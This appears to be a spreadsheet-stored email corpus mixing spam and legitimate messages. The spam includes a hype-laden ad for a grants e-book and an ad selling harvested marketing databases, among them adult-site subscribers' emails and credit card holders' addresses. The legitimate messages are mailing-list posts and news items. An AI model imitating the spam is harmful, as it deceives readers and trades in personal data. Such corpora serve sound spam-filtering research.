 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://cbphost.net/users/quiksilver/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;*** Thank you for being a part of another great offer from Quiksilver Enterprises. If you feel you don't belong on our opt-in list please send an email to: Quiksilver@cbulkhost.com and make sure to have "REMOVE" in the subject line. Thank you. 
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 4795Sgyf9-600UjiD5376rfdA5-224brKs3596Alrq4-097nMdy5984RFdb1-998ALzS1480RVgh2-348l76
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: America's great misleader
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8674045,215/
 Date: 2002-10-08T16:56:00+01:00
 *World dispatch:* Bush's arguments strain the limits of plausibility to justify 
 war on Iraq, and this, says *Simon Tisdall*, means regime change is imperative 
 - in Washington.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The product they dont want you to have...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;&lt;&lt; SPECIAL REVISED PRICE AS OF 5/24/2002 - HURRY QUANITIES WILL BE LIMITED &gt;&gt;&gt;
 Attention: Are you buying from the "Information America" type companies for .10-.15 cents per record, we sell the same types of data for 1000's of records per penny! As a matter of fact several of these companies use and sell our data since did not have the skills to compile / append the newer internet fields such as web site info and  e m a i l  information. 
 Please Read On...
 The Ultimate Traditional &amp; Internet Marketing Tool, Introducing the "M A S T E R  D I S C  2002" versions 4.00-4.10, now released its MASSIVE 11 disc set with over 145 Million database records (18-20 gigabytes of databases) for marketing to companies, people, via  e m a i l, fax, phone and mailing addresses Worldwide!
 COMPLETE 11 DISC SET IS ALL OF THE MARKETING DATA YOU WILL NEED FOR 2002 &amp; 2003 (Put your service or product out for the world to see!)
 We've been slashing prices once again to get you hooked on our leads &amp; data products.
 The full disc set ver 4.00-4.10 (Contains all databases, all software titles, all demos, more then 65 million records include an  e m a i l  address and many, many other useful fields) including unlimited usage is yours permanently for just $799.00 for the full set or $99.00 for the single sample disc (Normally Sold For $2800.00 for the full set and $299.00 for single sample disc) if you order today!
 **** M A S T E R  D I S C 2002 CONTENTS ****
 We've gone out of our way to insure that this product is the finest of its kind available.  Each CD (ver.4.01 to ver.4.10) contains approximately 10% of the 145 million records distributed within the following databases:
 - 411: USA white and yellow pages data records by state.
 - DISCREETLIST: Adult web site subscribers and adult webmasters  E M A I L  addresses.
 - FORTUNE: This database contains primary contact data relating to fortune 500, fortune 1000, and millions more corporations sort able by company size and sales.
 - GENDERMAIL:	Male and female email address lists that allow you target by gender with 97% accuracy.
 - MARKETMAKERS: Active online investors  E M A I L  addresses. Also information in reference to thousands of public companies symbols, and descriptions.
 - MAXDISC: Online website owners, administrators, and technical contacts for website domain name owners of the ".com", ".net", and ".org" sites.  This database has information from about 25% of all registered domains with these extensions.
 - NEWSPAPERS: National directory of newspapers from small local papers to large metro news agencies.
 - PITBOSS: Avid Online casino and sports book players, and casino webmasters.
 - SA: South American mailing databases from more than a dozen countries.  Each mailing address belongs to a Visa or MasterCard credit card holder.
 - SOFTWARE: This directory contains 86 software titles, some are fully functional versions and others are demo versions.  Many suites of commercial  e m a i l  tools as well as many other useful resources will be found here to help extract, verify, manage, and deliver successful commercial  e m a i l  marketing campaigns.
 For More Information, Available Records, Pricing, CUSTOM Databases, Ordering Contact us:
 D a t a C o m   M a r k e t i n g   C o r p
 1 4 4 0   C o r a l   R i d g e   D r.  #3 3 6
 C o r a l   S p r i n g s,  F l  3 3 0 7 1
 (9 5 4) 7 5 3-2 8 4 6 voice / fax (Promo Code: 052402)
 For no further notice at no cost and to be  disolved from all of our databases, simply  "r e p l y"  to this message with the word "Discontinue" in the subject line. IZ1
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA)
 Content-type: text/plain; charset=us-ascii; format=flowed
 Content-transfer-encoding: 7BIT
 Following further study, I've concluded:
    1. It is easy to enable the bytecode interpreter.
    2. This noticeably improves rendering of non-antialiased text.
    3. This noticeably *harms* rendering of antialiased text.
 Point #3 probably surprises the rest of you as much as it surprised me. 
   Ever since turning on the bytecode interpreter, I've been bugged by a 
 sense that the antialiased text in my GNOME2 applications just looked, 
 well, wrong somehow.  I finally took some comparison screen shots with 
 and without the interpreter, and that made the difference crystal clear.
 Consider the two images attached below.  The first, "no-bytecodes.png", 
 shows some text rendered by a GNOME2 panel menu without the bytecode 
 interpreter.  Contrast this with the second, "bytecodes.png", taken with 
 the bytecode interpreter enabled.
 When the bytecode interpreter is turned on, notice that several 
 rendering anomalies appear:
    - Several letters are narrower, giving the whole run of text a more
      compressed feel.  This is especially noticeable in "R" and "o".
    - The left side of the "Q" is painted in too light a shade of grey,
      causing it to drop out somewhat.  "C", not in this sample, has the
      same problem.
    - "Qu" are set right up against each other, with insufficient
      whitespace between them.
    - "M" is distinctly asymmetric.
    - The enclosed loop of "a" looks muddy, as it is partially filled
      with grey.  Contrast with "a" drawn without the bytecode
      interpreter, which has a nice clear open loop.
 Ick.  Perhaps this is why Red Hat turned the bytecode interpreter off. 
 It may improve non-antialiased rendering, but only at the expense of 
 making a mess of antialiased rendering.
 This may come down to a matter of personal aesthetics, but for my part, 
 I'm going back to Red Hat's standard packages with the bytecode 
 interpreter turned *off*.
 --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA)
 Content-type: image/png; name=no-bytecodes.png
 Content-transfer-encoding: base64
 Content-disposition: inline; filename=no-bytecodes.png
 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
 /wCHLIpMysuGygAAAABJRU5ErkJggg==
 --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA)
 Content-type: image/png; name=bytecodes.png
 Content-transfer-encoding: base64
 Content-disposition: inline; filename=bytecodes.png
 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
 --Boundary_(ID_xjiotMI3LbV/zJ0Zs39NiA)--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Tim O'Reilly, Bill Gates and Edgar Villanueva
</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting take...
 "But the more I think about it, the more you I realize that having
 governments specify software licensing policies is a bad idea."
 http://www.oreillynet.com/pub/wlg/1840
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] I hate noise!
</t>
  </si>
  <si>
    <t xml:space="preserve">Try that on a Sun :( you have to disect the keyboard 
 -----Original Message-----
 From: Smith, Graham - Computing Technician
 [mailto:Graham.Smith@it-tallaght.ie]
 Sent: Tuesday, August 13, 2002 12:07 PM
 To: ilug@linux.ie
 Subject: RE: [ILUG] I hate noise!
 I ususally disconnect the internal speaker - thats pretty sure to stop any
 beeping!
 G.
 ___________________________
  Graham Smith,
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: West Coast port closures may cancel Christmas.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8398677,1717/
 Date: 2002-09-30T16:15:14+01:00
 [IMG: http://www.newsisfree.com/Images/fark/sacbee.gif ([SacBee])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Pluck and Luck
</t>
  </si>
  <si>
    <t xml:space="preserve">At 5:29 PM -0700 on 9/23/02, John Hall wrote:
 &gt; Rawls claims Merit doesn't exist.
 Nozick claims that Rawls doesn't exist.
 God says that Nozick is dead?
 :-).
 Cheers,
 RAH
 Quine, of course, read the Herald, not the Globe. With him and Nozick went
 political "diversity" at Hahvahd...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</si>
  <si>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Re: [Razor-users] Razor v2 effectiveness stats - HTML table - Take 2
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, I was serious. I'm awful with perl/etc. I just think the HTML graph that
 was created was pretty neat and I wish I could do something like that. :-)
 &gt; I can't tell if you are serious or joking.  I have a custom perl based
 spam
 &gt; blocking framework that uses plug-ins to block spam.  I test each message
 &gt; with every plug-in and keep the stats in a mysql database, which are what
 &gt; you see below.
 &gt;
 &gt; Fox
 &gt;
 &gt;
 &gt; ----- Original Message -----
 &gt; From: "Jonathan Nichols" &lt;jnichols@pbp.net&gt;
 &gt; To: &lt;razor-users@example.sourceforge.net&gt;
 &gt; Sent: Tuesday, September 03, 2002 2:07 PM
 &gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
 Take
 &gt; 2
 &gt;
 &gt;
 &gt; &gt; How do you make up graphs like that, anyway? :-)
 &gt; &gt;
 &gt; &gt; ----- Original Message -----
 &gt; &gt; From: "Daniel Higgins" &lt;dhiggins@netc.net&gt;
 &gt; &gt; To: "Fox" &lt;lds0062@cdc.net&gt;; &lt;razor-users@example.sourceforge.net&gt;
 &gt; &gt; Sent: Tuesday, September 03, 2002 10:57 AM
 &gt; &gt; Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
 &gt; Take
 &gt; &gt; 2
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; that's pretty impressive, have you seen any false positives yet? myself
 &gt; i'm
 &gt; &gt; still at the stage of creating the corpuses. i'll report back after i
 get
 &gt; &gt; some testing of my own :P
 &gt; &gt;   ----- Original Message -----
 &gt; &gt;   From: Fox
 &gt; &gt;   To: razor-users@example.sourceforge.net
 &gt; &gt;   Sent: Tuesday, September 03, 2002 12:54 PM
 &gt; &gt;   Subject: Re: [Razor-users] Razor v2 effectiveness stats - HTML table -
 &gt; &gt; Take 2
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;   Sorry about the html, for those of you still using elm or other
 non-GUI
 &gt; &gt;   clients.  I don't have time to post it as text.
 &gt; &gt;
 &gt; &gt;   The "Spam Count" is the total of all spam detected by the various
 &gt; filters.
 &gt; &gt;
 &gt; &gt;   Jammed is a custom phrase ranking system.
 &gt; &gt;   Razored is Razor v2.
 &gt; &gt;   Bayesian filter is based off of Paul Graham's work (statistical
 &gt; &gt;   probability), using a corpus of 4000 non-spam and 2000 spam messages.
 &gt; &gt;
 &gt; &gt;         Spam Statistics
 &gt; &gt;         Date Spam Count Jammed Razored Blacklisted Trollbox Bayesian
 &gt; &gt;         2002-08-27 370 145    (39.19%) 181    (48.92%) 79    (21.35%)
 120
 &gt; &gt; (32.43%) 275    (74.32%)
 &gt; &gt;         2002-08-28 397 106    (26.70%) 126    (31.74%) 163    (41.06%)
 136
 &gt; &gt; (34.26%) 320    (80.60%)
 &gt; &gt;         2002-08-29 346 154    (44.51%) 146    (42.20%) 78    (22.54%)
 101
 &gt; &gt; (29.19%) 261    (75.43%)
 &gt; &gt;         2002-08-30 366 163    (44.54%) 166    (45.36%) 65    (17.76%)
 138
 &gt; &gt; (37.70%) 272    (74.32%)
 &gt; &gt;         2002-08-31 282 211    (74.82%) 133    (47.16%) 27    ( 9.57%)
 132
 &gt; &gt; (46.81%) 256    (90.78%)
 &gt; &gt;         2002-09-01 220 127    (57.73%) 125    (56.82%) 22    (10.00%) 91
 &gt; &gt; (41.36%) 157    (71.36%)
 &gt; &gt;         2002-09-02 166 86    (51.81%) 77    (46.39%) 22    (13.25%) 64
 &gt; &gt; (38.55%) 123    (74.10%)
 &gt; &gt;
 &gt; &gt;
